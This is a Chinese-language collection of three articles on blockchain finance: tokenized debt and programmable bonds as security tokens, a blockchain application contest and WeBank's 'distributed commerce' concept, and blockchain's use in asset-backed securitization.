绝大多数资产类别都有债务的部分。房地产资产可以表示为债务和股权的组合,大多数公司的结构也是如此。从这个角度来看,将世界通证化的探索在很大程度上是对债务进行通证化的行为。通证化债务直接带来的优势如下:

1)普世性:债务是一种与贸易本身一样古老的普遍概念。大多数国家都采用类似的债务工具,这让通证化债务工具可以在全球流通。

2)市场规模:债务市场规模巨大。仅在公开市场,债券和固定收益类产品就占100万亿美元,每日交易额达1000亿美元。这很轻松得就能超过全球股票市场的估值,这还不包括私人债务工具,如汽车贷款、学生贷款、信用卡债务等等。

3)短期收益:通证化债务还会支付股息。投资者会更愿意投资证券型通证,因为他们知道即使他们进行任何交易,也会按季度获得收益。

4)可组合性:债务很容易组合。将一系列通证化的房地产租赁汇总成代表债务抵押债券(CDO)的加密证券较为简单。这种工具的链上表示也有助于为其底层结构、证券持有者、风险管理以及在这种衍生形式中混入的其他元素带来更多透明度。

5)可分割性:它们也可以分割成更简单的表示形式。可分性可以使新的投资者群体立即获得通证化债务工具。

6)场外交易:世界上大多数债务工具都是在场外交易的(OTC)。债券通证可以通过提供简化的交易数字印记(digital footprint)来补充此模型。

7)期货和衍生品:对于大多数加密资产而言,期货和衍生品仍然是一个难以实现的目标,但是通证化债务可能是它的完美载体。债务是一种相对简单的资产,可以作为期货工具进行建模,也相对较容易理解。

下面的图表在证券通证背景下比较了债务和股权工具:

区块链上的现金流-可编程债券(三步曲)

通证化债务的构建模块

讲完了好处以后,我们可以开始思考如何落地实施这种新形式的加密证券了。不幸的是,这是整个事情变得复杂的地方,因为债务证券没有原生合约(protocol)。像Dharma这样的协议为基于债务的证券通证提供了灵感,但它们必须经过严格调整后才能适用于真实场景。Dharma和债务证券通证协议之间的区别在于前者专注于将加密资产的借贷自动化,而后者则专注于创建现有债务工具的通证化表示,并使现有债务合约中的条款自动化。

区块链上的现金流-可编程债券(三步曲)

如果Dharma不是我们所需的解决方案,那么我们需要什么样的合约?债务证券通证合约(ST Debt Protocol)可能不仅仅是一种合约,而是几种合约的组合,囊括了通证化债务的不同动态。在较高的层级上,证券通证中的通证化债务的架构可以如下图所示:

区块链上的现金流-可编程债券(三步曲)

Part II: A Protocol for Tokenized Debt(通证化债务合约)

基于债务的证券通证目前发展面临的一个主要障碍是:缺乏一个可以将债务工具的生命周期抽象化表示的链上合约。基于股权的证券通证类似于对于“股票”的半静态表示(semi-static),但基于债务的加密证券在其生命周期中表现出更多动态行为,例如到期兑付股息或违约行为。

因此,基于债务的证券通证将需要一个新的合约,以通证的形式描绘出这些债务独具的特征。像Dharma这样的针对加密资产的债券合约对我们有所启示,但和将现实债务通证化所需的合约还是有所不同。

ST Debt Protocol的作用是用过智能合约的形式,实现债务工具中各参与主体间的可编程交互。要创建此类协议,我们需要首先了解不同类型的债务证券通证及其相应的参与者。

债务证券通证的形式

债务工具的生命周期可以通过三个主要角色之间的交互来概括:

区块链上的现金流-可编程债券(三步曲)

债务工具可以以两种主要形式实现,具体取决于承销过程是在链上还是在链下发生:

·通证化的链下债务:发行代表链下债务(债券或房地产租赁)的链上通证;

·原生链上债务:债务通证,其从承销到到期的整个生命周期都是在链上进行的。

我们预计第一代债务证券通证将主要是前者—“链下债务产品”的通证化表示,但合约将逐步发展,以至可以支持创建100%的链上债务。

无论我们将链下的债务工具通证化还是创建链上基础设施,我们都需要一个包含债务交互主要组成部分的合约。

架构一个债务证券通证合约

债务证券通证合约(ST Debt Protocol)需要将债务工具生命周期的各要素整合进来,主要元素包含:

·到期日:每个基于债务的证券通证都应具有到期日,在相关债务到期日,发行人将向通证持有人支付通证的票面价值;

·票面价值:票面价值是到期时相关债券的价值。

·利率:利率是发行人在通证生命周期内向通证持有人支付的名义金额。利率可以根据通胀水平进行调整;

·成熟期:需要根据特定成熟期定期支付利息;

·评级:债务通证评级是描述债务通证质量或风险的值。通常,评级越高,利率越低;

·收益率:这是债务通证持有人在到期日可以获得的总回报。

将上述的组件放在证券通证中,我们可以为基于债务的加密证券描绘出一个简单的结构。

区块链上的现金流-可编程债券(三步曲)

债务证券通证合约需要超越通证结构本身,并模拟债务工具中不同参与者之间的交互。在较高的层级上,该类型的协议应该存在以下角色:

区块链上的现金流-可编程债券(三步曲)

·债务通证发行人(Issuers):创建通证化债务工具的实体

·债务通证持有人(Holders):拥有债务通证的实体

·本息、收益的分发者(Payment Distributors):为债务通证持有人分发利息和收益的实体

·评级者(Raters):发布与特定债务证券通证相关的质量或风险评级的实体

·仲裁者(Arbiters):在违约的情况下,负责解决债务通证发行人与持有人之间纠纷的实体

让我们通过一个案例看一下整个流程:

假设一家名为IssuerA的hard money loan(通过房产抵押而非依据借贷人信用获得贷款的借贷)公司将一笔贷款通证化,面值为1000美元,季度利息为10%,5年到期。代表信贷机构的Rater(评级者)对贷款进行评级,评级为AAA,表明相关资产具有很高质量。 IssuerA将分发10,000个通证。两个人HolderA和HolderB都购买了1000个通证。在第一季度末,该协议将通过Payment Distributors向HolderA和HolderB支付10美元。如果IssuerA没有支付后续款项,则债务合同将被锁定并发送给仲裁员来解决。

的确,这个例子过于简化了,但希望能够表达出证券通证债务协议背后的一些简单形态。

证券通证中第一代可能非常简单和局限。但随着行业的发展,我们会看到新形式的债务证券通证,它们将创造出现在还不存在的创新型债务工具。

Part III: Reimagining Debt with Security Tokens(重新想象基于ST的债务)

加密证券的神奇之处在于它不仅能让我们创建现有资产类别的链上数字形态,还允许我们创建在现有财务流程限制范围内无法实现的新证券工具。证券通证将解锁一个与其名称一样有趣的概念:可编程债务。

可编程债务

证券通证中可编程性的潜力似乎与基础资产的行为丰富度成比例增加。股权资产的行为是基于一些非常有限的动态,如买入、卖出和持有,而债务工具还可以表现出诸如股息支付、违约、承销或收益再平衡等行为,为解锁证券通证的潜力提供了更广阔的视野。区块链上的现金流-可编程债券(三步曲)

下面,本文列举了一些新型的基于债务的证券通证,这些通证利用可编程性的好处来实现新功能,同时还为通证持有者提供直接的好处。

可组合的债务产品

债务工具本质上是可组合的。从数学上讲,如果D1(r1,d1,i1)和D2(r2,d2,i2)是两个具有不同风险水平、股息支付和利率的债务证券通证,我们可以建立一个新的债务通证D3(r(r1,r2),d(d1,d2),i(i1,i2)),将基础证券通证组合成单个可交易单元。组合的债务证券通证是加密衍生品的形式,可以产生令人难以置信的强大功能,以对冲不同的市场条件,平衡不同级别的风险和股息模型。创造债务抵押债券(CDO)等组合债务产品是一件工作量很大的事情,但是像Set这样的区块链协议已经提供了技术基础,让我们用几行代码就可以将债务通证组合成新形式的加密证券。

区块链上的现金流-可编程债券(三步曲)

可分割和组合的债务产品

除了易于组合之外,基于债务的证券通证也需要是可分割的。通证持有者可以获得债务加密证券的一小部分,这将使他们获得与其特定持股相关的股息支付、利率和风险敞口。

债务-股票ETF通证

交易所交易基金(ETF)是可以将单一证券下的债券和股票结合起来的工具。借鉴ETF世界的一些概念,我们可以设想将债券和股票通证的篮子组合成一个单独单位的证券通证,以平衡特定市场和投资者的风险和回报。

实时股息分配

债务产品的股息分配是在诸如季度或年度的长周期中完成的。以债务为基础的证券通证没有传统债务工具的限制,可以以更及时的方式向债权人分配股息。想象一下,一个债务加密证券代表了一系列房地产租赁,这些租赁通过编程在每月租约到期时向证券持有人分配股息。无论商业模式的可行性如何,这种债务工具在传统金融市场中是无法构想的。

通证化激励

债务证券通证另一个令人着迷的一个方面是使用加密经济学(Token Economy)来激励债务参与者之间进行良性互动。想象一下,每当债务发行人按时支付股息时,协议都会使用加密通证来奖励他们。类似的加密模型可用于激励承销商,评估通证化债务工具的审计师,或调节不同参与者之间纠纷的仲裁者。

基于债务的证券通证的路线图

在三篇文章中,我们讨论了基于债务的证券通证的许多不同方面。我们绘制出了在未来半年和一年内债券型通证发展的时间表,梳理了可能实现并且终将打开债务证券通证世界大门的各个标志性事件。以下是时间表:

区块链上的现金流-可编程债券(三步曲)

基于债务的证券通证有可能成为解锁流动性和接入主流投资者的第一种加密证券形式。从债务证券通证协议的基础开始,债务工具提供了一个独特的画布,可以试验证券通证中最雄心勃勃的概念。让我们一同开启这个伟大的实验!

区块链应用落地者众,“分布式商业”正处于爆发前夜

图片
12月21日,金链盟中国区块链应用大赛(以下简称“金链盟大赛”)总决赛在深圳落下帷幕。
从8月份以来,近300支参赛队伍基于FISCO BCOS平台,在政务、金融、公益、医疗、教育、交通、版权、商品溯源、农业、社交、游戏等几十个领域开发并推进了区块链应用的落地上线。
这些参赛团队或是出自于金融机构如中国人寿、前海人寿、厦门国际银行、第一创业证券等,或是出自于知名企业如四川长虹、四方精创、深圳CA、亦笔科技、猪八戒网等,或是出自于高等院校如北京大学、清华大学、中科院等的师生,或是远道而来的日本、美国的初创企业,当然,还有大量实力不凡的中国初创企业和个人开发者团队。
01|金链盟中国区块链应用大赛盘点:百花齐放,落地者众
决赛当日,来自政府、学术机构、云平台、系统集成商、媒体、金链盟成员单位等的近300名代表及个人开发者共同见证数百万大奖的诞生。
最终,基于区块链技术高效处理网上纠纷的司法仲裁链方案,以成熟的项目运作、真实落地并上线稳定运营,以及具备过硬的技术能力等优势斩获冠军,项目主体杭州亦笔科技成为了100万特等奖奖金得主。
云之道与四方精创联合参赛的基于白盒密码算法的区块链电子合同存证方案、四川长虹安全实验室参赛的物联网可信互联解决方案则分列大赛一等奖、二等奖。
清华大学学生团队的跨层全栈区块链安全项目、深圳CA可信电子固证项目、武汉链动时代的不动产登记项目、深圳优讯的旅游金融联盟项目、全链通的畜牧业区块链溯源项目、山东观海数据的智慧城市项目、北京版全家科技的版权保管箱项目则荣获了三等奖。
此外,上海救要救的互助急救项目、日本永腾集团的小微金融项目、前海人寿的区块链保单管理项目、华中科技大学的学生图书流转项目、云块科技的区块链中间件项目等也获得了优秀奖。
图片
参赛项目覆盖各行各业,印证区块链发展潜力
微众银行副行长、金链盟技术委员会主席马智涛评点指出,从本次大赛的参赛与获奖情况可判断,以服务公众作为目标的公众联盟链将会是未来非常重要的技术趋势,不仅能够为公众切切实实带来体验提升、效率提高、成本下降、信任增强、数据透明、责任明确等好处,还能够帮助中小企业实现价值与优势互补和快速开展对等协作,更能作为关键技术钥匙,打开“分布式商业”的应用大门,实现反垄断的终极商业理想。
那么,分布式商业模式是如何演变而来?其内涵是什么?又有什么样的发展潜力和商业价值呢?
02|反垄断商业模式的百年孤独
事实上,从15世纪现代商业萌芽于意大利至今,数百年来的商业组织一直追求做大做强的集中式和垄断式商业模式。
尽管第一部《反垄断法》已设立一百多年,中小微企业(MSMEs)也被各国政府普遍认为是提升经济增长、拉动社会就业、促进产品和服务创新的重要驱动力,但大型企业及其集中式的商业模式仍然始终占据商业价值的主导地位。
一项数据例证是,《财富》杂志自1955年开始发布美国500强榜单,当时美国500强总营业收入大约相当于美国GDP的35%规模,2007年这一数据却已高达73%。
即使是08年金融危机发生后,“大而不倒Too Big to Fail”的弊病显现,反垄断化的呼声逐渐强烈,至2018年这一数据仍高达66%。
商业本身是一种竞争、自由的经济活动,而自由竞争的结果,天然就容易导致优胜劣汰、资本集中、甚至权力寻租。
图片
正所谓慈不带兵、义不行贾,中国的第一代商人吕不韦们就已信奉“囤积居奇”的经商手段,现代商业鼻祖佛罗伦萨的美第奇家族更是通过联合王权与教权而实现商权的垄断。
垄断,意味通过控制某种产品或服务的生产和销售市场,把商品或服务的价格提高到平均价格之上,从而获得超过平均利润的高额垄断利润。
因此,在数百年来的商业发展中,企业天然倾向于追求这种集中式、垄断化的“做大做强”商业模式。
03|反垄断V1.0:连锁商业
在过去相当长的时间里,商业主体都是以“集中式管理+集中式经营”为主。随着全球化进程加快和分工需求增加,第一代的反垄断商业模式直至20世纪50年代才开始发出了微弱的声音,这便是“连锁商业”模式。
连锁商业,意味着经营同类产品或服务的若干经营单位,以同一商标、统一管理或授予特许经营权的方式组织起来,通过对企业形象和经营业务的标准化管理,共享规模效益,获取竞争优势,其特点是“集中式管理+分布式经营和销售”。
连锁商业的代表者就是麦当劳和肯德基,通过引入连锁经营体系,公司规模迅速发展,并得以冲破冷战时代的贸易保护主义的藩篱,从美国向世界各地蔓延。
时至80年代,全球连锁经营飞速发展,沃尔玛、家乐福、星巴克、7-11等纷至涌现,美国几乎每6.5分钟就有一家连锁店开业;又至中国加入WTO后,中国连锁经营企业也开始遍地开花,中国连锁百强企业的平均年店铺增长率一度高达51%。
在连锁商业模式下,总部企业负责品牌设计、商品生产、渠道采购、规范服务和制度管理等,保留了大部分的产品和服务能力,分散的中小微企业主体则以连锁加盟等形式接受总部企业的统一组织领导,通过专注于销售能力本身,拓展客户,最终分担相对微薄的收益。
连锁商业模式第一次打破了供给侧的集中和垄断,从中分离出“分布式”的经营能力和销售能力,让中小微企业主体也有机会成为商业价值链的一环。
连锁商业的能力分解
04|反垄断V2.0:共享商业
近十年来,随着主要发达国家人口步入老龄化社会的程度较深,消费需求下降,供给侧的闲置资源增加,又受益于移动互联网的普及,第二代反垄断商业模式开始崭露头角,这便是“共享商业”模式。
例如Uber、Airbnb、滴滴打车等主打“共享”的创业公司,因低价、便利、个性化等优势收获了大量用户。本质上,共享商业的目标在于令商品或服务的所有者让渡使用权,从而使社会闲散资源充分利用,实现整个社会效益的最大化。
其中,移动互联网技术提高了资源分配效率,通过在线服务平台,以及大数据、AI、LBS等技术,将资源的供给者和需求者进行快速匹配,并促进他们在平台上完成商业交易行为。
在打车、住宿等共享商业模式下,商品和服务的集中度被进一步打散,其提供者甚至是以个人为主,实现了供给侧的“分布式”。
不过,共享商业的渠道、销售、管理等能力,仍然依赖中间的平台商。商品服务的提供者需要受平台的统一管理,遵守平台的规则制度,需按交易抽成支付给平台,在初期也可能获取平台补贴,因此其特点仍是“集中式管理+分布式服务”。
共享商业的能力分解
如果共享商业平台始终维持中间商的定位,坚持“轻资产”的经营策略,则共享商业将是商品和产能过剩时代的最佳选择。
然而,数百年来的“做大做强”的基因使得共享商业开始逐渐变味,平台方自身开始深度介入供给侧。例如共享单车,笔者认为其实质上与共享商业的精神已然背道而驰,单车是平台方大量购买,不但没有利用闲置资源,反而由于各平台都是以不断增加投入、购买大量新单车投放的手段抢夺市场份额,造成了资源的大量浪费,还消耗城市公共部门的治理精力。
平台方也以挤走对手、赢者通吃、形成行业垄断地位为目的,屠龙者成为了新的巨龙,远远违背了反垄断的初心。
无边落木萧萧下,反垄断商业模式的百年尝试,成果终究寥寥。不过,放眼于下一个10年,云计算、区块链、人工智能等创新技术开始让中小微企业看到了些许“反垄断”的曙光。
05|科技革命让未来已来
2015年以来,在海量大数据积累的基础上,越来越多的前沿科技如云计算、区块链、人工智能、移动互联网技术等逐渐成熟,使得商业模式进一步变革具备现实可能性,从而促进企业进行跨业合作、加强分工精细化程度、加快创新产品的敏捷性、重构价值链条的分配。
例如,云计算技术推动商业社会朝着平台化方向发展,可有效降低多主体进行商业合作的成本。商业活动所需的各类能力可以进一步实现“分布式”,不同的商业参与方可分别贡献架构设计能力、产品设计能力、运营和风控能力、销售能力、资金筹集能力、客户服务能力等,从而在云平台中叠加了软件服务、牌照、业务流程、端到端的产品体验和最佳行业实践等,形成平台化服务。
进行合作的商业主体无需再重复建设IT基础设施,可降低为响应市场需求的快速试错与快速迭代成本。
更进一步地,区块链和分布式账本技术的解决方案让商业模式的全面“分布式”成为可能。
图片
通过区块链中的非对称加密、隐私保护算法、共识机制、智能合约、点对点通信技术、分布式架构技术、分布式存储和安全多方计算技术等,可以让商业模式中的参与各方都享有对等的地位。
企业间可构建对等互信的区块链网络,便捷安全地点对点地交换和共享数据;可采用共享的分布式账本记录业务数据,避免数据被篡改、被伪造或产生一致性差异,还能实现全业务流程的可追溯可审计;可通过智能合约功能实时自动生成相关文件,自动执行业务逻辑及商业契约等。
由此,企业间的合作与连接变得更加简化,未来多个企业组建区块链网络共同开展业务甚至可能像现在建立“聊天群”一样高效便捷。
这不仅降低了企业快速试错的成本,有效提升商业上的容错性,也促进商业社会朝着可信化、透明化的方向深化发展,全面降低合作的操作风险、道德风险、信用风险、信息保护风险等。
此外,人工智能技术也推动商业社会朝着智能化、自动化的方向发展,促进商业中的智能协同合作。
业务流程全面转向智能化之后,多方合作的规则与执行可交由算法进行自动化处理,从而提升商业合作的公平性与效率。例如,基于AI的联邦迁移学习技术就能够在有效保护各参与方数据隐私的基础上解决信息孤岛问题,促进商业中的各方协同合作实现价值最大化。
最后,移动互联网技术仍在持续推动商业社会朝着移动化、场景化方向发展,可让商业场景更加“无处不在、无时不在”。
产品和服务可通过SDK或API等方式渗透至电商、外卖、打车、租房、装修等各行各业的APP和生活场景中,无限贴近用户需求,发现或重塑客户关联,同时提高有效资源的周转效率和服务客户频次,实现客群、渠道、产品、交互及周转频次等多维度相互叠加的全面价值发掘,最终形成实现双方甚至多方共赢的下一代商业模式。
06|反垄断V3.0:分布式商业
新一轮的商业模式变革与分布式技术的发展息息相关,其目标也是让商业活动中的供给商和中间平台商在生产、管理、经营、服务等方面实现充分的“分布式”和去垄断化。
在2017年初,微众银行在新闻稿中首次将这种新型的第三代反垄断商业模式命名为“分布式商业”。
目前,分布式商业这个概念已被行业广泛接受,各企业也初步展开对分布式商业的探索。
分布式商业的能力分解
按微众银行整理给出的定义,分布式商业是一种由多个具有对等地位的商业利益共同体所建立的新型生产关系,是通过预设的透明规则进行组织管理、职能分工、价值交换、共同提供商品与服务并分享收益的新型经济活动行为。
在主要表现特征上,分布式商业显现出多方参与、共享资源、智能协同、价值整合、模式透明、跨越国界等特点。
一个成熟的分布式商业场景应具备生产资料由多方持有、产品和服务能力由多方共同构建、商业过程中的相互关系对等,产品和利益分配规则透明等要求。
以微众银行正在探索的分布式零售举例,在零售商业场景中,比如会有一些客户,可能既喜欢吃汉堡又喜欢吃拉面,那么就可以通过区块链的技术手段,帮助汉堡店和拉面店组建成商业联盟,让客户可以在这两个店中享受权益的互通或进行权益的互换。
当然,目前也有一些积分平台通过充当中介的角色来实现权益互联互通,但由于积分平台掌控了流量入口,从而深度掌控了定价权与话语权,那么小微商家的利益与客户的权益往往就会被牺牲掉一部分;甚至还有一些积分平台缺乏监督,存在挪用客户权益与资金的种种问题。
新型的基于公众联盟链的分布式零售方案,则可以帮助权益的提供方与权益的需求方快速建链合作,并由银行参与方进行账务的清结算、以及资金的监督和运营管理等,由于技术本身已经完全开源,各参与方可以真正实现对等、透明地合作,资金和权益的安全性也得到保障。
更广泛地看,金融行业参与者群体广泛,不同类型的金融机构其资质、资本、资源等禀赋各异、互补性较强,因此通常是以同业合作的对等形式共同设计产品或开展业务,天然具备了分布式商业案例的雏形。
同时,医疗、司法、政务、供应链等多个领域也都存在类似需求与要求,各类分布式商业应用场景正在逐渐酝酿中。
商业模式的进化
分布式商业作为第三代反垄断商业模式,与前两代的连锁商业模式和共享商业模式的最大不同之处在于,分布式商业可实现更彻底和更充分的去集中、去垄断,打破此前弱肉强食的“丛林法则”,让中小微企业真正成为商业价值链的主角,从而激发经济增长动力、广泛提升就业、鼓励创业和创新。
不同商业模式的区分
07|分布式商业的探索实践逐渐增加,或正处于爆发前夜
随着分布式商业正式登上舞台,其最重要的基础设施——区块链底层技术正处于百家争鸣的时期,各大致力于探索分布式商业及分布式技术的联盟也正百花齐放。
例如金融区块链合作联盟(深圳)(简称金链盟)、中国区块链技术和产业发展论坛(CBD-Forum)、中国分布式总账基础协议联盟(Chinaledger)、中国人工智能开源软件发展联盟(AIOSS)等皆是其中的探路者。
图片
本次金链盟大赛也涌现了许多具备巨大分布式商业潜力的应用场景,可以预见的是,未来将有越来越多的参与者认识到分布式商业的魅力并开始转型加入这些联盟或开源社区。
由于在分布式商业中,商品与服务的提供方都能实现足够的“分布式”,参与地位也更为平等,起到中间链接桥梁作用的只有技术本身。如果技术不开源,确实也可能演变成新的垄断。
因此,发展分布式商业需始终保持技术开源的态度,各个参与方通过开源社区进行分工合作,那么将不再存在话语权集中和垄断的可能性,真正达到“反垄断”的人类商业终极理想。
目前,分布式商业或已处于爆发的前夜,也许就在三年或五年之内,分布式商业就将全面接棒共享商业的大旗
恰如今天的UBER、Airbnb,未来我们也将看到琳琅满目的分布式出行、分布式住宿、分布式零售、分布式能源、分布式政务、分布式娱乐、分布式金融等杀手级的商业应用场景。
而改变的时机就在当下,且将新火试新茶,乘风破浪趁年华。

区块链在资产证券化中的应用

资产证券化作为填补债券市场链接实体经济与金融活动空缺的重要工具,对提高资产配置效率具有重要意义。受到发展阶段与技术水平限制,我国资产证券化发行规模与流动性不及预期。瀚德金融科技研究院副院长、中国人民大学国际货币研究所研究员杨望,瀚德金融科技研究院副研究员周钰筠在《中国金融》撰文,对区块链在资产证券化交易体系的应用案例进行研究,结论表明区块链技术有助于加速构建一体化的资产证券化交易体系,从而打破ABS信息黑箱、破壁发展困境、激发市场活力。

资产证券化(Asset-backed Securities, ABS)自2005年传入国内,经历了长时间的曲折发展,甚至受到亚洲金融危机冲击一度被叫停,在2011年才再次重启券商资产证券化试点[i]。考虑到起步时间晚与国内金融市场环境的客观因素,我国ABS在法律法规建设、监管机制、二级市场流动性、风险定价与评级、市场参与度等方面与发达国家相比仍存在许多不足[ii]。

区块链技术打破了以数据库为中枢的传统模式,数据的录入与存放由各个节点共同完成,并共同拥有完整账本。在资产证券化场景中搭建全新流程与基础设施,提升效率与安全性,有望解决资产证券化流程复杂不透明、缺乏活力的缺陷。近几年已有不少学者针对这一主题展开研究。管同伟[iii](2018)指出利用区块链特有的信息处理技术可有效消除ABS的结构性风险。温胜辉[iv](2018)认为引入区块链技术可实现ABS底层资产保真,增强投资人信心。徐光[v](2018)等人认为应用区块链技术可以重新设计ABS传统业务模式,优化整体业务流程。本文将结合国内ABS发展现状与瓶颈,探索区块链如何应用于一体化的ABS交易体系破壁ABS困境,并结合具体区块链ABS平台与区块链ABS案例研究,对国内ABS市场发展提供参考建议。

ABS传统业务生态瓶颈犹存

ABS业务交易体系由交易结构与各参与方构成。随着ABS交易结构设计复杂性不断提升,当前金融服务基础设施已无法满足越来越高的管理水平需求。错综复杂的资产信息与交易链条对业务整体化形成了冲击,将交易各方、各环节隔离,生态呈现破碎形态,瓶颈也随之显现。第一,入池资产多,穿透性差。出于风险考虑,投资者对证券化产品预期收益、回款周期及安全性的评估过度依赖于信用评级机构的投后基础资产跟踪与监督,无法直接触及入池基础资产。对于投资者来说,目前大多倾向依靠发行主体信用背书和外部评级,底层资产呈现透明度低,难以有效监控资产池情况。第二,融资流程复杂冗长,效率低下。真实资产状况掌握在发起人手中,当前管理水平的信息整合时效性、条理性不达市场期望,增加多余试探成本。第三,信息数据缺失,评级定价困难。资产动态入池提高信息披露难度、加重不对称性,在投后管理阶段,后入池的资产质量难以保证与及时跟进,发行方对资产的管理能力存疑。征信制度相对匮乏给金融公司建立客户信用档案造成很大挑战,大量模型试验提高了坏账风险,风险定价准确性低,投资者信心不足。

ABS一体化交易体系优势凸显

区块链作为一种不可篡改、透明安全、多中心化的数据储存技术,兼有海量数据处理、溯源能力与灵活高效的分析手段,天然适合创造新的信任与操作机制,打造一体化交易体系。首先,分布式账本能重新设计底层系统,给参与各方提供资产质量、交易信息的共同记录。此外,数据库上实时更新各参与机构的资金交易信息,摒弃过去耗费多余资源的清算环节。针对目前资产证券化的痛点,区块链赋能ABS一体化生态有望打破传统模式禁锢:

资产穿透

穿透资产主要用于消弭信息不对称。将ABS运行路径中的资产信息和现金流信息入链,项目的参与各方因此拥有共识信息。从资产评级角度,传统资产评级机构的评论往往带有主观性,且主体信用评级与项目信用评级难以剥离,评价客观性有待商榷。利用区块链数据库中详实记录的数据可轻易将项目数据分离出来,生成独立的项目与主体信用评价,有助于健全投资评价体系。从风险控制角度,在智能合约中编入预警参数与相应的违规处置、合约终止等止损操作设置,设置业务时间、资金阈值,触发条件后自动执行投资或担保措施,从根源上预防SPV管理人等参与方的违约行为,保障投资人利益。得益于分布式结构的设计,金融监管机构只需加入接入其中一个节点便可实时监控金融杠杆等状态,凭借永久性审计追溯防范系统性风险。

提升效率

传统的标准资产证券化业务至少包含10多个参与方,交易链条极长,资产信息与资金需经过层层流转。借款人向权益人借款形成初始债权资产,权益人经过考核,筛选适合资产进行资产证券化操作,发起人聘请证券公司或信托公司作为计划管理人或受托人(SPV),再经过评级机构、会计师事务所、律所等完善,最后通过承销商发行[vi]。区块链技术可自动根据资产数据与产品特征的匹配度高效筛选出符合标准的底层资产,缩短Pre-ABS准备时间;智能合约自动执行设计在交易过程中减少操作成本。

活跃市场

长期以来,我国资产证券化在二级市场上流动性相对缺乏制约了ABS市场的发展扩大,大多投资者更倾向于将ABS持有到期。信息不对称不透明、定价可信度低是ABS在二级市场交投寡淡的重要因素,引入区块链技术的ABS能曝光资产证券化交易结构中的激励错配信息,缓解委托-代理问题,帮助更好地完成价格发现,从而提升投资者信心,促进ABS在二级市场的流动。另一方面,区块链技术有助于提升金融交易系统的安全弹性。攻击者需改写一半以上的节点才能破坏数据,系统安全性随着参与节点的增加而提升;多个同时运作的“并联”节点能保证在某一节点出现瘫痪时,其他节点仍能可靠运作,容错性大大提高。

一体化交易体系平台——以国金ABS云为例

区块链在一体化ABS交易体系的应用实践之一是ABS一体化平台的搭建,以国金ABS云(下称“ABS云”)为例,该平台立足于区块链底层数据库系统设计以支持ABS项目的运行。以ABS云作为支撑平台,利用区块链技术手段,将ABS业务流程化、电子化、标准化,让市场上众多的资产证券化项目透明清晰地呈现,从而迅速对接资产或资金,降低资产证券化操作门槛,有效控制运作成本。

国金ABS云交易体系

ABS云利用区块链、大数据等技术,搭建基于云的底层设施来整合各ABS环节,实现ABS线上操作一体化流程,高效对接资产端和资金端,同时数字化的资产形态为区块链技术引入创造条件。

ABS云基于区块链对交易中心、数据库等基础设施进行系统开发,为交易各方提供全面资产数据,实现信息共享与快速流转。ABS云依托联结各参与方和各操作环节,将产品运转信息完整上链,使确保数据完整和实时监控存续期成为可能,体现在制定风险标准、业务操作、增信服务、挂牌交易等环节有据可依。

区块链ABS一体化流程解决方案

针对上述分析,ABS云利用引入区块链技术的解决方案在打破信息黑箱、优化ABS 的现金流管理方面取得了喜人的效果,证券交易的高效性和透明度大大增强,不仅有利于穿透式监管,还提高了金融资产的出售结算效率,降低增信环节的转移成本。

以联盟链为支撑覆盖ABS产品生命全周期:底层架构设计引入分链、多通道和共识节点技术,保证系统处理并发数据能力。管理平台贯穿资产登记、数据清洗、资产组合构建、风险评级、产品设计、现金流管理及交易转让等业务环节,使上链的业务信息跨机构、跨层级高效流转。

基于区块链的 ABS 一体化流程解决方案(如图2)基于囊括所有参与方的联盟链,将各参与方接入共识节点,赋予数据权限。区块链数据库覆盖了整个资产证券化六阶段流程,从前期的资产池数据、风险评级及交易结构导入,到准备期的产品设计发行,再到中期投资人注册登记环节的链上数据获取与上传,最后到后期对基础资产的现金流进行全面的实时动态监控。区块链数据系统运行贯穿了发行前、发行中、投资人、注册登记、存续管理各环节,各参与方与数据库的读写紧密相关(如图3)。

引入区块链技术的ABS管理系统较之传统ABS业务操作具有无可比拟的优势,从效率、成本、信任、监管四个方面进行优化。一为效率提升。区块链分布式账本技术在各交易方间达成业务信息共识,流程清晰化,提高交易方之间的协同效率。二为成本降低。区块链分布式账本提供完整可触摸数据,打破数据孤岛。对融资方而言有助于降低操作及合规成本;对投资方而言,动态实时的信息验证渠道能提升投资者信心,减少沟通成本。三为信任建立。在资产包形成阶段通过对信贷历史表现、资产违约情况、多头借贷等数据进行分析,精细化地对每笔资产进行风险评分,实时更新上链,达到优化资产增信效果。对各资产穿透式的管理有效改善信息不对称问题,区块链不可篡改、可追踪的技术特点大大降低信用风险与定价风险。四为监管便捷。穿透资产信息同样有利于监管穿透、实时监控,降低监管难度。

一体化交易体系产品——以区块链ABS项目为例

自2016年区块链独立于比特币进入金融领域的视野,被认为是数字经济时代的必要推动力。2016年 9月中国人民银行副行长范一飞鼓励各机构主动探索区块链金融的应用,国务院于同年年底发布的《“十三五”国家信息化规划》第一次提出区块链战略发展方向。2017年以来不乏金融公司下海尝试区块链与ABS的结合,不少项目成功落地(如表1),应用区块链技术将ABS业务流程各环节打通,业务一体化的探索提供可参考的经验。

随着ABS市场逐步放开、规模逐渐扩大,市场对资产证券化服务商的要求也逐步提高,促进服务机构积极探索新型技术的引入。实践表明,ABS对资产风险分散的需求与区块链的技术优势不谋而合。目前来看债券类ABS与区块链结合更受资本市场欢迎,未来消费金融、各类贷款、企业债券、融资租赁等资产或会成为区块链ABS的一大风口。从技术引入角度看,区块链在资产证券化业务流程一体化中的应用大体包括:分布式账本提供全数据支持保证信息真实、实时动态监控保证信用安全、自动化流程防范诈骗及多方联盟链提升操作效率。

区块链入局ABS交易体系大有可为

我国资产证券化虽起步较晚,但发展速度不可小觑,未来发展潜力巨大。近年来ABS产品发行再攀高峰,参考中债登研究中心《资产证券化发展报告(2017)》,2017年与2018上半年ABS发行规模分别达1.43万亿元和0.6722万亿元,同比增长分别为63%和39%。市场参与度相对提高的同时,绝对存量占比仍较低。利用ABS融资的企业在三年间从23家增加到了250家,ABS产品利率与其他产品利率差也逐渐收紧,甚至不乏接近短期票据收益的产品,市场认可度较高。然而放眼于整个债券市场,2017年ABS占比仅为3.5%,相较美国22%的占比,我国ABS市场在未来大有可为。可喜的是,消费金融、供应链金融、房地产金融等主流ABS基础资产的急速兴起为ABS市场发展提供充足动力。虽然已有部分企业尝到了区块链ABS的甜头,业界内也逐步认识到其发展的巨大潜力,但在企业级应用层面远未达成熟阶段,在技术规模推广、安全隐患解决、法律法规方面还存在明显不足。

